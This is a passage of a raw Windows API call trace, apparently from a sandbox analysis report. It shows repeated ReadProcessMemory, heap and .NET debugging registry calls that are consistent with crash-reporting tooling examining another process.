lpData=0x4c1ec77a48*=0x0, lpcbData=0x4c1ec77a40*=0x4) returned 0x2 [0078.904] RegCloseKey (hKey=0x1fc) returned 0x0 [0078.904] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x22b34ad0000 [0078.904] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570000, lpBuffer=0x22b34ad0030, nSize=0x40, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad0030*, lpNumberOfBytesRead=0x4c1ec77c50*=0x40) returned 1 [0078.905] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf60 [0078.905] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570130, lpBuffer=0x22b34ad0090, nSize=0x108, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad0090*, lpNumberOfBytesRead=0x4c1ec77c50*=0x108) returned 1 [0078.905] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd410 [0078.905] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc165701e8, lpBuffer=0x22b34ad01c0, nSize=0x8, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad01c0*, lpNumberOfBytesRead=0x4c1ec77c50*=0x8) returned 1 [0078.905] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bce10 [0078.905] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16c76b2c, lpBuffer=0x22b34ad01f0, nSize=0x1c, lpNumberOfBytesRead=0x4c1ec77c80 | out: lpBuffer=0x22b34ad01f0*, lpNumberOfBytesRead=0x4c1ec77c80*=0x1c) returned 1 [0078.905] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd440 [0078.905] GetLastError () returned 0xcb [0078.905] SetLastError (dwErrCode=0xcb) [0078.905] GetLastError () returned 0xcb [0078.905] SetLastError (dwErrCode=0xcb) [0078.905] GetLastError () returned 0xcb [0078.905] SetLastError (dwErrCode=0xcb) [0078.905] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16ea93a8, lpBuffer=0x22b34ad0230, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0230*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.905] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bced0 [0078.905] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934000, lpBuffer=0x22b34ad0260, nSize=0x98, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0260*, lpNumberOfBytesRead=0x4c1ec781a0*=0x98) returned 1 [0078.905] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf00 [0078.905] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934040, lpBuffer=0x22b34ad0320, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0320*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.906] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd020 [0078.906] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e400, lpBuffer=0x22b34ad0350, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0350*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.906] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd050 [0078.906] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x4c1ec78288, nSize=0x8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x4c1ec78288*, lpNumberOfBytesRead=0x4c1ec78190*=0x8) returned 1 [0078.906] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x22b34ad0380, nSize=0x7c8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0380*, lpNumberOfBytesRead=0x4c1ec78190*=0x7c8) returned 1 [0078.906] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd080 [0078.906] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x400) returned 0x22b349be490 [0078.906] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a27b0 | out: hHeap=0x22b349a0000) returned 1 [0078.906] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95be30, lpBuffer=0x22b34ad0b70, nSize=0x198, lpNumberOfBytesRead=0x4c1ec78160 | out: lpBuffer=0x22b34ad0b70*, lpNumberOfBytesRead=0x4c1ec78160*=0x198) returned 1 [0078.906] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd0b0 [0078.906] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x861390, lpBuffer=0x22b34ad0d30, nSize=0x8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0d30*, lpNumberOfBytesRead=0x4c1ec78190*=0x8) returned 1 [0078.906] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7210 [0078.906] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25b7668, lpBuffer=0x22b34ad0d60, nSize=0x94, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0d60*, lpNumberOfBytesRead=0x4c1ec78190*=0x94) returned 1 [0078.906] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c72a0 [0078.906] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2a0, lpBuffer=0x22b34ad0e20, nSize=0x14, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0e20*, lpNumberOfBytesRead=0x4c1ec78190*=0x14) returned 1 [0078.906] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7090 [0078.907] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc12e8c978, lpBuffer=0x22b34ad0e60, nSize=0x40, lpNumberOfBytesRead=0x4c1ec78160 | out: lpBuffer=0x22b34ad0e60*, lpNumberOfBytesRead=0x4c1ec78160*=0x40) returned 1 [0078.907] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7240 [0078.907] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2b0, lpBuffer=0x4c1ec783c0, nSize=0xd50, lpNumberOfBytesRead=0x4c1ec78230 | out: lpBuffer=0x4c1ec783c0*, lpNumberOfBytesRead=0x4c1ec78230*=0xd50) returned 1 [0078.907] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bd000, lpBuffer=0x4c1ec79110, nSize=0x8a0, lpNumberOfBytesRead=0x4c1ec78230 | out: lpBuffer=0x4c1ec79110*, lpNumberOfBytesRead=0x4c1ec78230*=0x8a0) returned 1 [0078.907] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bb4f0 | out: hHeap=0x22b349a0000) returned 1 [0078.907] VirtualFree (lpAddress=0x22b34ad0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.907] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf00 | out: hHeap=0x22b349a0000) returned 1 [0078.907] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd050 | out: hHeap=0x22b349a0000) returned 1 [0078.907] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf60 | out: hHeap=0x22b349a0000) returned 1 [0078.907] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd020 | out: hHeap=0x22b349a0000) returned 1 [0078.907] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd080 | out: hHeap=0x22b349a0000) returned 1 [0078.907] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd0b0 | out: hHeap=0x22b349a0000) returned 1 [0078.907] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd410 | out: hHeap=0x22b349a0000) returned 1 [0078.907] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bce10 | out: hHeap=0x22b349a0000) returned 1 [0078.907] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bced0 | out: hHeap=0x22b349a0000) returned 1 [0078.907] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd440 | out: hHeap=0x22b349a0000) returned 1 [0078.907] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7210 | out: hHeap=0x22b349a0000) returned 1 [0078.907] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c72a0 | out: hHeap=0x22b349a0000) returned 1 [0078.907] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7090 | out: hHeap=0x22b349a0000) returned 1 [0078.907] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7240 | out: hHeap=0x22b349a0000) returned 1 [0078.907] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349be490 | out: hHeap=0x22b349a0000) returned 1 [0078.907] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd320 | out: hHeap=0x22b349a0000) returned 1 [0078.908] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a17a0 | out: hHeap=0x22b349a0000) returned 1 [0078.908] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcff0 | out: hHeap=0x22b349a0000) returned 1 [0078.908] OutOfProcessExceptionEventSignatureCallback () returned 0x0 [0078.908] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffc37f90000 [0078.908] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetProcessIdOfThread") returned 0x7ffc37faf030 [0078.908] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetThreadId") returned 0x7ffc37fae7c0 [0078.908] GetProcessIdOfThread (Thread=0x38c) returned 0x69c [0078.908] GetThreadId (Thread=0x38c) returned 0x8cc [0078.908] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd320 [0078.908] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x18) returned 0x22b349bb4f0 [0078.908] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x160) returned 0x22b349a17a0 [0078.908] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd410 [0078.908] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x80) returned 0x22b349a27b0 [0078.908] GetEnvironmentVariableA (in: lpName="MSCORDACWKS_DEBUG", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.908] GetEnvironmentVariableW (in: lpName="COMPlus_DbgDACSkipVerifyDlls", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.908] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77a50 | out: phkResult=0x4c1ec77a50*=0x0) returned 0x2 [0078.908] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77a58 | out: phkResult=0x4c1ec77a58*=0x1fc) returned 0x0 [0078.908] RegQueryValueExW (in: hKey=0x1fc, lpValueName="DbgDACSkipVerifyDlls", lpReserved=0x0, lpType=0x4c1ec77ab8, lpData=0x4c1ec77a48, lpcbData=0x4c1ec77a40*=0x4 | out: lpType=0x4c1ec77ab8*=0x0, lpData=0x4c1ec77a48*=0x0, lpcbData=0x4c1ec77a40*=0x4) returned 0x2 [0078.908] RegCloseKey (hKey=0x1fc) returned 0x0 [0078.908] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x22b34ad0000 [0078.909] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570000, lpBuffer=0x22b34ad0030, nSize=0x40, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad0030*, lpNumberOfBytesRead=0x4c1ec77c50*=0x40) returned 1 [0078.909] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd440 [0078.909] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570130, lpBuffer=0x22b34ad0090, nSize=0x108, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad0090*, lpNumberOfBytesRead=0x4c1ec77c50*=0x108) returned 1 [0078.909] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf60 [0078.909] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc165701e8, lpBuffer=0x22b34ad01c0, nSize=0x8, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad01c0*, lpNumberOfBytesRead=0x4c1ec77c50*=0x8) returned 1 [0078.909] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcff0 [0078.909] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16c76b2c, lpBuffer=0x22b34ad01f0, nSize=0x1c, lpNumberOfBytesRead=0x4c1ec77c80 | out: lpBuffer=0x22b34ad01f0*, lpNumberOfBytesRead=0x4c1ec77c80*=0x1c) returned 1 [0078.909] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bce10 [0078.909] GetLastError () returned 0xcb [0078.909] SetLastError (dwErrCode=0xcb) [0078.909] GetLastError () returned 0xcb [0078.909] SetLastError (dwErrCode=0xcb) [0078.909] GetLastError () returned 0xcb [0078.909] SetLastError (dwErrCode=0xcb) [0078.909] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16ea93a8, lpBuffer=0x22b34ad0230, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0230*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.910] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd080 [0078.910] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934000, lpBuffer=0x22b34ad0260, nSize=0x98, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0260*, lpNumberOfBytesRead=0x4c1ec781a0*=0x98) returned 1 [0078.910] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bced0 [0078.910] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934040, lpBuffer=0x22b34ad0320, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0320*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.910] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf00 [0078.910] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e400, lpBuffer=0x22b34ad0350, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0350*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.910] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd020 [0078.910] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x4c1ec78288, nSize=0x8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x4c1ec78288*, lpNumberOfBytesRead=0x4c1ec78190*=0x8) returned 1 [0078.910] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x22b34ad0380, nSize=0x7c8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0380*, lpNumberOfBytesRead=0x4c1ec78190*=0x7c8) returned 1 [0078.910] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd050 [0078.910] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x400) returned 0x22b349be490 [0078.910] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a27b0 | out: hHeap=0x22b349a0000) returned 1 [0078.910] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95be30, lpBuffer=0x22b34ad0b70, nSize=0x198, lpNumberOfBytesRead=0x4c1ec78160 | out: lpBuffer=0x22b34ad0b70*, lpNumberOfBytesRead=0x4c1ec78160*=0x198) returned 1 [0078.910] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd0b0 [0078.910] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x861390, lpBuffer=0x22b34ad0d30, nSize=0x8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0d30*, lpNumberOfBytesRead=0x4c1ec78190*=0x8) returned 1 [0078.910] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7150 [0078.910] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25b7668, lpBuffer=0x22b34ad0d60, nSize=0x94, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0d60*, lpNumberOfBytesRead=0x4c1ec78190*=0x94) returned 1 [0078.911] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7510 [0078.911] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2a0, lpBuffer=0x22b34ad0e20, nSize=0x14, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0e20*, lpNumberOfBytesRead=0x4c1ec78190*=0x14) returned 1 [0078.911] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7540 [0078.911] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc12e8c978, lpBuffer=0x22b34ad0e60, nSize=0x40, lpNumberOfBytesRead=0x4c1ec78160 | out: lpBuffer=0x22b34ad0e60*, lpNumberOfBytesRead=0x4c1ec78160*=0x40) returned 1 [0078.911] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7330 [0078.911] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2b0, lpBuffer=0x4c1ec783c0, nSize=0xd50, lpNumberOfBytesRead=0x4c1ec78230 | out: lpBuffer=0x4c1ec783c0*, lpNumberOfBytesRead=0x4c1ec78230*=0xd50) returned 1 [0078.911] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bd000, lpBuffer=0x4c1ec79110, nSize=0x8a0, lpNumberOfBytesRead=0x4c1ec78230 | out: lpBuffer=0x4c1ec79110*, lpNumberOfBytesRead=0x4c1ec78230*=0x8a0) returned 1 [0078.911] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bb4f0 | out: hHeap=0x22b349a0000) returned 1 [0078.911] VirtualFree (lpAddress=0x22b34ad0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.911] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bced0 | out: hHeap=0x22b349a0000) returned 1 [0078.911] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd020 | out: hHeap=0x22b349a0000) returned 1 [0078.911] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd440 | out: hHeap=0x22b349a0000) returned 1 [0078.911] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf00 | out: hHeap=0x22b349a0000) returned 1 [0078.911] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd050 | out: hHeap=0x22b349a0000) returned 1 [0078.911] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd0b0 | out: hHeap=0x22b349a0000) returned 1 [0078.911] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf60 | out: hHeap=0x22b349a0000) returned 1 [0078.912] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcff0 | out: hHeap=0x22b349a0000) returned 1 [0078.912] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd080 | out: hHeap=0x22b349a0000) returned 1 [0078.912] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bce10 | out: hHeap=0x22b349a0000) returned 1 [0078.912] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7150 | out: hHeap=0x22b349a0000) returned 1 [0078.912] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7510 | out: hHeap=0x22b349a0000) returned 1 [0078.912] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7540 | out: hHeap=0x22b349a0000) returned 1 [0078.912] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7330 | out: hHeap=0x22b349a0000) returned 1 [0078.912] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349be490 | out: hHeap=0x22b349a0000) returned 1 [0078.912] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd410 | out: hHeap=0x22b349a0000) returned 1 [0078.912] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a17a0 | out: hHeap=0x22b349a0000) returned 1 [0078.912] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd320 | out: hHeap=0x22b349a0000) returned 1 [0078.912] OutOfProcessExceptionEventSignatureCallback () returned 0x0 [0078.912] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffc37f90000 [0078.912] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetProcessIdOfThread") returned 0x7ffc37faf030 [0078.912] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetThreadId") returned 0x7ffc37fae7c0 [0078.912] GetProcessIdOfThread (Thread=0x38c) returned 0x69c [0078.912] GetThreadId (Thread=0x38c) returned 0x8cc [0078.912] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd020 [0078.912] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x18) returned 0x22b349bb970 [0078.912] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x160) returned 0x22b349a17a0 [0078.912] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bced0 [0078.912] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x80) returned 0x22b349a27b0 [0078.912] GetEnvironmentVariableA (in: lpName="MSCORDACWKS_DEBUG", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.912] GetEnvironmentVariableW (in: lpName="COMPlus_DbgDACSkipVerifyDlls", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.912] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77a50 | out: phkResult=0x4c1ec77a50*=0x0) returned 0x2 [0078.912] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77a58 | out: phkResult=0x4c1ec77a58*=0x1fc) returned 0x0 [0078.912] RegQueryValueExW (in: hKey=0x1fc, lpValueName="DbgDACSkipVerifyDlls", lpReserved=0x0, lpType=0x4c1ec77ab8, lpData=0x4c1ec77a48, lpcbData=0x4c1ec77a40*=0x4 | out: lpType=0x4c1ec77ab8*=0x0, lpData=0x4c1ec77a48*=0x0, lpcbData=0x4c1ec77a40*=0x4) returned 0x2 [0078.913] RegCloseKey (hKey=0x1fc) returned 0x0 [0078.913] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x22b34ad0000 [0078.913] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570000, lpBuffer=0x22b34ad0030, nSize=0x40, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad0030*, lpNumberOfBytesRead=0x4c1ec77c50*=0x40) returned 1 [0078.913] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd080 [0078.913] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570130, lpBuffer=0x22b34ad0090, nSize=0x108, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad0090*, lpNumberOfBytesRead=0x4c1ec77c50*=0x108) returned 1 [0078.913] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bce10 [0078.913] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc165701e8, lpBuffer=0x22b34ad01c0, nSize=0x8, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad01c0*, lpNumberOfBytesRead=0x4c1ec77c50*=0x8) returned 1 [0078.913] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd320 [0078.913] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16c76b2c, lpBuffer=0x22b34ad01f0, nSize=0x1c, lpNumberOfBytesRead=0x4c1ec77c80 | out: lpBuffer=0x22b34ad01f0*, lpNumberOfBytesRead=0x4c1ec77c80*=0x1c) returned 1 [0078.913] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf60 [0078.913] GetLastError () returned 0xcb [0078.913] SetLastError (dwErrCode=0xcb) [0078.913] GetLastError () returned 0xcb [0078.913] SetLastError (dwErrCode=0xcb) [0078.913] GetLastError () returned 0xcb [0078.914] SetLastError (dwErrCode=0xcb) [0078.914] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16ea93a8, lpBuffer=0x22b34ad0230, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0230*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.914] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf00 [0078.914] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934000, lpBuffer=0x22b34ad0260, nSize=0x98, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0260*, lpNumberOfBytesRead=0x4c1ec781a0*=0x98) returned 1 [0078.914] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcff0 [0078.914] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934040, lpBuffer=0x22b34ad0320, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0320*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.914] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd050 [0078.914] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e400, lpBuffer=0x22b34ad0350, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0350*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.914] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd0b0 [0078.914] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x4c1ec78288, nSize=0x8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x4c1ec78288*, lpNumberOfBytesRead=0x4c1ec78190*=0x8) returned 1 [0078.914] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x22b34ad0380, nSize=0x7c8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0380*, 